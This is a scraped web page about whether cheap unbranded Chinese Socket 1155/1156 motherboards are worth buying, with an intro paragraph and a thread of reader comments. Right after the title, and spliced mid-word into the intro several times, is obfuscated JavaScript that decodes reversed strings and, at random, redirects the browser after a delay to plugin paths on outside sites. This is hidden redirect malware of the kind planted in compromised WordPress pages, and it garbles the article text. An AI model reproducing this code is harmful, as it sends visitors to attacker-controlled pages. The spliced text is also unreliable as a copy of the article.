Cheap 1155 and 1156 Motherboards from China – Are they worth it?

$NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=1&autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toplay=1″ frameborder=”0″ allowfullscreen>

With DDR4 memory prices as high as they are, it is tempting toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to build a budget Gaming PC around Socket 1155, 1156 and 1150 motherboards. You can find brand new motherboards all over the Internet, they are non branded and looking at the specification they appear toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to be legit. But when you look closer, and actually test them, lots of little cons are discovered. Are you better off buying a used board instead?

I really hope this bootleg mobo makers will fix their shiiiet, theres alot of used cpus flooding the market and cheap ddr3s, not everyone can buy top of the line pc parts. there will always be plebs(like me) who would settle for a steady 30 fps game

  4. FŰCK SHĪT says:

With that price, you can buy know brand motherboards

Low quality vrm, surprised it booted with a i7 at all.

It's actually a Msata slot, I actually got this motherboard to use for a 4core Xeon and I noticed gpus don't overclock correctly

The Lowest you can go is ASRock

Most people I know have already scraped their home desktops. Some others have put them up for sale on used sites but there aren't much buyers for desktops anymore. So far laptops have managed to survive the disruption brought by android phones.

Bought a LGA1366 Mobo from China, only thing that annoys me is that it only has 100mbit ethernet. But actually a great deal considering LGA1366 CPUs are very cheap and still capable.

    No EFI?

  11. IncandescentWithRage says:

I think the WHEA uncorrectable errors are due to the bad Intel microcode update for spectre.

  12. John Doe says:

Another Intel 6x chipset board, best to avoid. Stick to the 7x chipsets.

  13. Thomas Samoht says:

That stuff has a lot of compatibility problems with ram dimms and cpus…

I bought the S1155 Board some time ago. The PWM bug and the layout are serious negativ points for me. On the other side, i installed windows 10 pro just to benchmark this board. Windows got activated without any key input…

any recommendations for i7 2600? I'd like micro atx or itx but as long as it doesnt cost much.

  16. Pasta Sarmonella E-Specialé says:

Damn can´t the Chinese not do anything properly? At least make something that is fully functional and not only cheap.

  18. Cheyo Pimienta says:

Well, assuming you can buy a mobo for your not so old processor, sure you'll be better with branded mobos. Problem is that in most of the non 1st world you cant! Prices on discontinued mobos are sky high, so this chinese mobos, with all their quirks and stuff, are a great, cheap option

lol $50 😀 I paid for a brand new asus hm81-k $45 back in sep 2014. Can't believe they're still selling them for this much

  21. der Jack says:

    make a clear statement.
if if not even supports Turbo boost, it's just not a true 1156/1151 board, as this is a min requirement!
    alpha status board.

  22. Robert T says:

8x vs 16x couldn't save that much power to be a real reason, could it?

  23. Safouane Ch says:

Thank you very much for this review..kinda needed it. Will definitely go for a branded

  24. Charles Sami Amyouni says:

Thank you Phil for sacrificing yourself on this, this saved me a lot of money for even considering this as one of my options – now I'll just look for an ASUS 1156 motherboard.

  28. Mirko N says:

Jeez I bought a used ASrock P67 Extreme 6 (1155) of eBay for 66€ (around 75 USD) here in Germany back in 2012. Running a Xeon E1220 v1 it still feals pretty decend and works fantastic. Hardware became expensive with the rising of mobile devices…..

  29. Kim Dahyun says:

Is ecs h61h2-mV worth? I bought it for only 25 $?

  30. Keith Petrino says:

I suppose the market is limited, but it would be good if they started building clone boards for old platforms that we could use for dos gaming, complete with ISA slots and the whole bit. In any case, $50 is not a good deal. I just bought an Asrock ab450 pro4 AM4 board for ryzen for $60US on a special.
